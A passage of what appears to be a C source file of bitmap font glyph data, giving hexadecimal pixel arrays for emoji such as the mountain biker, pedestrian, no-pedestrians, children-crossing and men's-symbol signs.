0x0, 0x18, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0,
0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0,
0xc, 0x0, 0x0, 0x0, 0x0, 0x1, 0x80, 0x0,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0, 0x3c,
0x0, 0x0, 0x0, 0x0, 0x1, 0x80, 0xff, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xd8, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xcb, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xfe, 0x3c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf3, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xfe, 0x7f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xcf, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0xfd, 0xff, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xff, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xff, 0xff, 0x0, 0x0, 0x0, 0x0, 0x3,
0xff, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x1f, 0xfb,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x3, 0xfe, 0x3f,
0xff, 0x80, 0x0, 0x0, 0xf, 0xff, 0xc1, 0xff,
0xf8, 0x0, 0x0, 0x3, 0xff, 0xf0, 0x1f, 0xff,
0xe0, 0x0, 0x0, 0x3f, 0xfe, 0x1, 0xff, 0xff,
0x0, 0x0, 0x3, 0x9f, 0x80, 0x1f, 0xff, 0x38,
0x0, 0x0, 0x19, 0xf8, 0x1, 0xff, 0xf1, 0x80,
0x0, 0x1, 0x99, 0x80, 0x1f, 0xfe, 0x18, 0x0,
0x0, 0xf, 0x3f, 0xfb, 0xff, 0xc1, 0x80, 0x0,
0x0, 0x70, 0x3f, 0xff, 0xff, 0xf0, 0x0, 0x0,
0x6, 0x0, 0x7, 0xff, 0xff, 0x0, 0x0, 0x0,
0x60, 0x0, 0x7f, 0xec, 0x0, 0x0, 0x0, 0x6,
0xf, 0xf, 0xf9, 0xc0, 0x0, 0x0, 0x0, 0xc0,
0x7f, 0xff, 0x1c, 0x0, 0x0, 0x0, 0xc, 0x47,
0x7f, 0xe0, 0xe0, 0x0, 0x0, 0x0, 0xc6, 0x31,
0xfe, 0x7, 0x0, 0x0, 0x0, 0xc, 0xf1, 0x9f,
0xc4, 0x38, 0x0, 0x0, 0x1, 0x8f, 0xd, 0xfc,
0xe3, 0x80, 0x0, 0x0, 0xf8, 0xf8, 0xff, 0xdf,
0x1f, 0xf0, 0x0, 0x3f, 0x8d, 0xc7, 0xff, 0xb8,
0xff, 0xc0, 0xf, 0x39, 0xee, 0x3f, 0xf1, 0xc6,
0x1f, 0x1, 0xc3, 0x1f, 0xf1, 0xfe, 0xc, 0x70,
0x78, 0x38, 0x31, 0xff, 0x1f, 0xc1, 0xe3, 0x83,
0xc7, 0x83, 0x3b, 0xf8, 0xfc, 0x3f, 0x1c, 0x1e,
0x70, 0x73, 0x1d, 0xdf, 0xff, 0xf8, 0xc0, 0xe7,
0x6, 0x31, 0xcf, 0xff, 0xff, 0xce, 0xe, 0xe0,
0x63, 0xe, 0x7f, 0xc0, 0x0, 0x60, 0x7e, 0x6,
0x70, 0xe7, 0xf8, 0x0, 0x3, 0x7, 0xe0, 0xc6,
0xe, 0x3f, 0x0, 0x0, 0x30, 0x7e, 0x6, 0x60,
0xe7, 0xff, 0xff, 0xfe, 0x7, 0xe0, 0x7e, 0xe,
0x7f, 0xff, 0xff, 0xc0, 0x7e, 0x3, 0x80, 0xe6,
0x6, 0x30, 0x0, 0x7, 0x70, 0x0, 0x1c, 0x60,
0x63, 0x80, 0x0, 0xe7, 0x0, 0x1, 0xc7, 0xfe,
0x38, 0x0, 0xe, 0x38, 0x0, 0x38, 0x7f, 0xe1,
0xc0, 0x1, 0xc3, 0xc0, 0x7, 0x80, 0x0, 0xe,
0x0, 0x3c, 0x1e, 0x0, 0xf0, 0x0, 0x0, 0xf0,
0x7, 0x80, 0xf8, 0x3e, 0x0, 0x0, 0x7, 0xc1,
0xf0, 0x3, 0xff, 0x80, 0x0, 0x0, 0x1f, 0xfc,
0x0, 0xf, 0xe0, 0x0, 0x0, 0x0, 0x7f, 0x0,
/* U+1F6B5 "🚵" */
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x0, 0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x3, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x6, 0x0, 0x3, 0x0, 0x3f, 0x0, 0x0,
0x0, 0x0, 0x6, 0x0, 0x3, 0x0, 0xff, 0xc0,
0x0, 0x0, 0x0, 0x6, 0x0, 0x7f, 0x3, 0xe0,
0xf0, 0x0, 0x0, 0x0, 0x6, 0xff, 0xff, 0x7,
0x80, 0x38, 0x0, 0x0, 0x0, 0x7, 0xff, 0xe6,
0xf, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x7, 0xff,
0xe, 0x1c, 0x0, 0xf, 0x0, 0x0, 0x0, 0x1,
0xff, 0xf, 0xb8, 0x0, 0x3, 0x80, 0x0, 0x0,
0x1, 0xff, 0x9f, 0xf0, 0x0, 0x1, 0x80, 0x0,
0x0, 0x0, 0xff, 0x9f, 0xf0, 0x0, 0x0, 0xc0,
0x0, 0x0, 0x0, 0x7f, 0x3f, 0xfc, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x3f, 0x7f, 0xfe, 0x0,
0x0, 0x70, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xff,
0x0, 0x0, 0x38, 0x0, 0x0, 0x0, 0x7, 0xff,
0xff, 0x80, 0x0, 0x18, 0x0, 0x3f, 0x0, 0x1,
0xff, 0xff, 0x80, 0x0, 0x1c, 0x0, 0xff, 0xe0,
0x7, 0xff, 0xff, 0xc0, 0x0, 0xe, 0x1, 0xe1,
0xf8, 0xf, 0xff, 0xff, 0xc0, 0x0, 0x6, 0x3,
0x80, 0x3f, 0x3f, 0xff, 0xff, 0xe0, 0x0, 0x7,
0x7, 0x0, 0xf, 0xff, 0xdf, 0xff, 0xe0, 0x0,
0x3, 0xe, 0x0, 0x3, 0xff, 0x8f, 0xff, 0xe0,
0x0, 0x3, 0xc, 0x0, 0x3f, 0xfe, 0xf, 0xff,
0xe0, 0x0, 0x3, 0x1c, 0x0, 0xff, 0xfc, 0x7,
0xff, 0xf8, 0x0, 0x3, 0x38, 0x0, 0xff, 0xf8,
0x7, 0xff, 0xfc, 0x0, 0x3, 0x30, 0x0, 0xe7,
0xe0, 0x7, 0xff, 0xce, 0x0, 0x3, 0x70, 0x0,
0x67, 0xe0, 0x7, 0xff, 0x86, 0x0, 0x3, 0x60,
0x0, 0x66, 0x60, 0x7, 0xff, 0x86, 0x0, 0x3,
0xe0, 0x0, 0x3c, 0xff, 0xef, 0xff, 0x6, 0x0,
0x3, 0xc0, 0x0, 0x1c, 0xf, 0xff, 0xff, 0xfc,
0x0, 0x3, 0xc0, 0x0, 0x18, 0x0, 0x1f, 0xff,
0xfc, 0x0, 0x3, 0xc0, 0x0, 0x18, 0x0, 0x1f,
0xf3, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x18, 0x3c,
0x3f, 0xe7, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x30,
0x1f, 0xff, 0xc7, 0x0, 0x0, 0x3, 0xc0, 0x0,
0x31, 0x1d, 0xff, 0x83, 0x80, 0x0, 0x3, 0xc0,
0x0, 0x31, 0x8c, 0x7f, 0x81, 0xc0, 0x0, 0x3,
0xc0, 0x0, 0x33, 0xc6, 0x7f, 0x10, 0xe0, 0x0,
0x3, 0xc0, 0x0, 0x63, 0xc3, 0x7f, 0x38, 0xe0,
0x0, 0x3, 0xc0, 0x3, 0xe3, 0xe3, 0xff, 0x7c,
0x7f, 0xc0, 0x3, 0xc0, 0xf, 0xe3, 0x71, 0xff,
0xee, 0x3f, 0xf0, 0x3, 0xc0, 0x3c, 0xe7, 0xb8,
0xff, 0xc7, 0x18, 0x7c, 0x3, 0xc0, 0x70, 0xc7,
0xfc, 0x7f, 0x83, 0x1c, 0x1e, 0x3, 0xc0, 0xe0,
0xc7, 0xfc, 0x7f, 0x7, 0x8e, 0xf, 0x3, 0xc0,
0xe0, 0xce, 0xee, 0x7f, 0xf, 0xc7, 0x7, 0x3,
0xc1, 0xc1, 0xcc, 0x77, 0xff, 0xff, 0xe3, 0x3,
0x83, 0xc1, 0xc1, 0x8c, 0x73, 0xff, 0xff, 0xf3,
0x83, 0x83, 0xc3, 0x81, 0x8c, 0x39, 0xff, 0x0,
0x1, 0x81, 0xc3, 0xc3, 0x81, 0x9c, 0x39, 0xfe,
0x0, 0x0, 0xc1, 0xc3, 0xc3, 0x83, 0x18, 0x38,
0xfc, 0x0, 0x0, 0xc1, 0xc3, 0xc3, 0x81, 0x98,
0x39, 0xff, 0xff, 0xff, 0x81, 0xc3, 0xc3, 0x81,
0xf0, 0x39, 0xff, 0xff, 0xff, 0x1, 0xc3, 0xc3,
0x80, 0xe0, 0x39, 0x81, 0x8c, 0x0, 0x1, 0xc3,
0xc3, 0xc0, 0x0, 0x79, 0x81, 0x8e, 0x0, 0x3,
0xc3, 0xc1, 0xc0, 0x0, 0x71, 0xff, 0x8e, 0x0,
0x3, 0x83, 0xc1, 0xe0, 0x0, 0xf1, 0xff, 0x87,
0x0, 0x7, 0x83, 0xc0, 0xe0, 0x0, 0xe0, 0x0,
0x7, 0x0, 0x7, 0x3, 0xc0, 0xf0, 0x1, 0xe0,
0x0, 0x3, 0x80, 0xf, 0x3, 0xc0, 0x7c, 0x7,
0xc0, 0x0, 0x1, 0xe0, 0x3e, 0x3, 0xe0, 0x3f,
0xff, 0x80, 0x0, 0x0, 0xff, 0xfc, 0x7, 0x7f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc,
/* U+1F6B6 "🚶" */
0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x7f, 0xf0,
0x0, 0x0, 0xf, 0xff, 0xc0, 0x0, 0x1, 0xff,
0xfe, 0x0, 0x0, 0x3f, 0xff, 0xf0, 0x0, 0x7,
0xff, 0xff, 0x0, 0x0, 0x7f, 0xff, 0xf8, 0x0,
0x7, 0xff, 0xff, 0x80, 0x0, 0xff, 0xff, 0xf8,
0x0, 0xf, 0xff, 0xff, 0x80, 0x0, 0xff, 0xff,
0xfc, 0x0, 0xf, 0xff, 0xff, 0x80, 0x0, 0xff,
0xff, 0xf8, 0x0, 0x7, 0xff, 0xff, 0x80, 0x0,
0x7f, 0xff, 0xf8, 0x0, 0x7, 0xff, 0xff, 0x0,
0x0, 0x3f, 0xff, 0xf0, 0x0, 0x1, 0xff, 0xfe,
0x0, 0x0, 0xf, 0xff, 0xc0, 0x0, 0x0, 0x7f,
0xf0, 0x0, 0x0, 0x1, 0xff, 0x0, 0x0, 0x0,
0x3f, 0xf0, 0x0, 0x0, 0x3, 0xff, 0x80, 0x0,
0x0, 0x7f, 0xfc, 0x0, 0x0, 0x7, 0xff, 0xe0,
0x0, 0x0, 0xff, 0xff, 0x0, 0x0, 0x1f, 0xff,
0xf8, 0x0, 0x1, 0xff, 0xff, 0xc0, 0x0, 0x3f,
0xff, 0xfe, 0x0, 0x7, 0xff, 0xff, 0xf0, 0x0,
0xff, 0xff, 0xff, 0x80, 0x1f, 0xff, 0xff, 0xf8,
0x3, 0xff, 0xff, 0xff, 0xc0, 0x7f, 0xff, 0xff,
0xfe, 0xf, 0xe7, 0xff, 0xc7, 0xe1, 0xfe, 0x7f,
0xfc, 0x7e, 0x3f, 0xc7, 0xff, 0xc3, 0xf3, 0xf8,
0x7f, 0xfe, 0x3f, 0x3f, 0x87, 0xff, 0xe3, 0xf3,
0xf0, 0xff, 0xfe, 0x3f, 0x1e, 0xf, 0xff, 0xe3,
0xf0, 0x0, 0xff, 0xfe, 0x3f, 0x0, 0xf, 0xff,
0xe1, 0xe0, 0x1, 0xff, 0xfe, 0x1e, 0x0, 0x1f,
0xff, 0xe0, 0x0, 0x1, 0xff, 0xfe, 0x0, 0x0,
0x3f, 0xff, 0xf0, 0x0, 0x3, 0xff, 0xff, 0x80,
0x0, 0x7f, 0xff, 0xf8, 0x0, 0x7, 0xf8, 0xff,
0xc0, 0x0, 0xff, 0x7, 0xfe, 0x0, 0xf, 0xe0,
0x1f, 0xf0, 0x1, 0xfc, 0x0, 0xff, 0x80, 0x1f,
0xc0, 0x7, 0xfc, 0x3, 0xf8, 0x0, 0x3f, 0xc0,
0x7f, 0x0, 0x3, 0xfe, 0x7f, 0xf0, 0x0, 0x1f,
0xff, 0xfe, 0x0, 0x1, 0xff, 0xff, 0xe0, 0x0,
0xf, 0xff, 0xfc, 0x0, 0x1, 0xff, 0xff, 0xc0,
0x0, 0x1f, 0xe7, 0xf8, 0x0, 0x1, 0xfe, 0x3f,
0x80, 0x0, 0xf, 0xc1, 0xe0, 0x0, 0x0, 0x70,
/* U+1F6B7 "🚷" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x0, 0xf0, 0x0, 0x7,
0x80, 0x0, 0x3e, 0x0, 0x0, 0xfc, 0x0, 0x1,
0xe0, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x0, 0x0,
0x70, 0x0, 0x1c, 0xe0, 0x0, 0x7f, 0x80, 0x0,
0x1c, 0x0, 0x1c, 0x38, 0x0, 0x3f, 0xc0, 0x0,
0x7, 0x0, 0x1e, 0xe, 0x0, 0x1f, 0xe0, 0x0,
0x3, 0xc0, 0xe, 0x3, 0x80, 0x7, 0xe0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0xe0, 0x1, 0xe0, 0x0,
0x0, 0x38, 0x7, 0x0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0xe, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x3, 0x80, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0xe0, 0x3f, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x38, 0x7f, 0xf0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0xe, 0x7f, 0xfe,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x3, 0xbf, 0xff,
0xe0, 0x0, 0xe, 0x70, 0x0, 0x0, 0xff, 0xff,
0xf8, 0x0, 0x7, 0x38, 0x0, 0x0, 0x3f, 0xfe,
0x7c, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x1f, 0xff,
0x1e, 0x0, 0x0, 0xfc, 0x0, 0x0, 0xf, 0xff,
0x8e, 0x0, 0x0, 0x7e, 0x0, 0x0, 0xf, 0xff,
0xc7, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x1f, 0x3f,
0xe7, 0x80, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x9f,
0xf3, 0x80, 0x0, 0xf, 0xc0, 0x0, 0xff, 0x8f,
0xf9, 0xc0, 0x0, 0x7, 0xe0, 0x0, 0xfe, 0x7,
0xfc, 0xe0, 0x0, 0x3, 0xf0, 0x0, 0x38, 0x3,
0xfe, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x1,
0xff, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0xff, 0x80, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x7f, 0xe0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x7f, 0xf8, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x78, 0xfe, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x7c, 0x7b, 0x80, 0x0, 0xe, 0x70, 0x0, 0x0,
0x7c, 0x3c, 0xe0, 0x0, 0x7, 0x3c, 0x0, 0x0,
0x7c, 0x1e, 0x38, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x3c, 0xf, 0xe, 0x0, 0x3, 0x87, 0x0, 0x0,
0x1e, 0x7, 0xc3, 0x80, 0x1, 0xc1, 0xc0, 0x0,
0xf, 0x1, 0xe0, 0xe0, 0x1, 0xc0, 0xe0, 0x0,
0x3, 0x80, 0x78, 0x38, 0x0, 0xe0, 0x38, 0x0,
0x1, 0xe0, 0x3e, 0xe, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0xf0, 0xf, 0x3, 0x80, 0x70, 0x7, 0x0,
0x0, 0x78, 0x3, 0xc0, 0xe0, 0x70, 0x3, 0xc0,
0x0, 0x1c, 0x1, 0xf0, 0x38, 0x78, 0x0, 0xe0,
0x0, 0xf, 0x0, 0x7c, 0xe, 0x38, 0x0, 0x38,
0x0, 0x7, 0x80, 0x1e, 0x3, 0xb8, 0x0, 0xe,
0x0, 0x3, 0xc0, 0xf, 0x80, 0xf8, 0x0, 0x7,
0x80, 0x0, 0xe0, 0x3, 0xc0, 0x38, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F6B8 "🚸" */
0x0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x8e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x83, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0xe, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x40, 0xe0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0xf8, 0x38,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x7e, 0xe,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x7f, 0x3,
0x80, 0x0, 0x0, 0x3, 0x80, 0x0, 0x1f, 0x80,
0xe0, 0x0, 0x0, 0x3, 0x80, 0x0, 0xf, 0x80,
0x38, 0x0, 0x0, 0x3, 0x80, 0x0, 0x3, 0x80,
0xf, 0x0, 0x0, 0x7, 0x80, 0x78, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x7, 0x80, 0x7e, 0x1, 0xf8,
0x0, 0xf0, 0x0, 0x7, 0x80, 0x3f, 0x1, 0xfe,
0x0, 0x3c, 0x0, 0x7, 0x80, 0x1f, 0x81, 0xff,
0x0, 0xf, 0x0, 0x7, 0x80, 0xf, 0xc1, 0xff,
0xc0, 0x3, 0xc0, 0x7, 0x80, 0x3, 0xc1, 0xff,
0xf0, 0x0, 0xf0, 0x7, 0x80, 0x0, 0x1, 0xdf,
0xd8, 0x0, 0x3c, 0x7, 0x80, 0x0, 0x0, 0xcf,
0xef, 0x0, 0xf, 0x7, 0x80, 0x0, 0x78, 0x77,
0xf3, 0xc0, 0x3, 0xc7, 0x80, 0x0, 0xfe, 0x1b,
0xf8, 0xf0, 0x0, 0xf3, 0x80, 0x0, 0xff, 0x8f,
0xfc, 0x1c, 0x0, 0x3b, 0x80, 0x0, 0xff, 0xe3,
0xfe, 0x6, 0x0, 0xf, 0xc0, 0x0, 0xef, 0xff,
0xff, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x67, 0xff,
0x3f, 0x80, 0x0, 0x3, 0xf0, 0x0, 0x73, 0xf0,
0x1f, 0xe0, 0x0, 0x3, 0xdc, 0x0, 0x31, 0xf8,
0xe, 0x70, 0x0, 0x1, 0xcf, 0x0, 0x18, 0xfc,
0x7, 0x38, 0x0, 0x1, 0xe3, 0xc0, 0x0, 0x7e,
0x3, 0x8e, 0x0, 0x1, 0xe0, 0xf0, 0x0, 0x3f,
0x1, 0xc7, 0x0, 0x1, 0xe0, 0x3c, 0x0, 0x1d,
0x80, 0xe3, 0x80, 0x1, 0xe0, 0xf, 0x0, 0xe,
0x60, 0xf0, 0xe0, 0x1, 0xe0, 0x3, 0xc0, 0x7,
0x30, 0x70, 0x70, 0x1, 0xe0, 0x0, 0xf0, 0x3,
0x1c, 0x78, 0x1c, 0x1, 0xe0, 0x0, 0x3c, 0x3,
0x86, 0x38, 0xe, 0x1, 0xe0, 0x0, 0xf, 0x3,
0x83, 0x38, 0x7, 0x1, 0xe0, 0x0, 0x3, 0xc3,
0x81, 0xdc, 0x1, 0xc1, 0xe0, 0x0, 0x0, 0xf1,
0xc0, 0x6c, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x1c,
0x40, 0x30, 0x0, 0x31, 0xc0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x70, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x70, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x0,
/* U+1F6B9 "🚹" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x3, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x0,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe2, 0x0,
0x47, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf1, 0x0,
0x23, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x80,
0x10, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x40,
0xc, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x60,
0x6, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x30,
0x3, 0xf, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x18,
0x1, 0xc7, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1c,
0x0, 0xe3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xde,
0x18, 0x7b, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x86, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc3, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe1, 0x87, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0xc3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf8, 0x61, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x30, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x18, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x86, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc3, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xe1, 0x87, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf0, 0xc3, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x61, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x30, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x18, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x9e, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
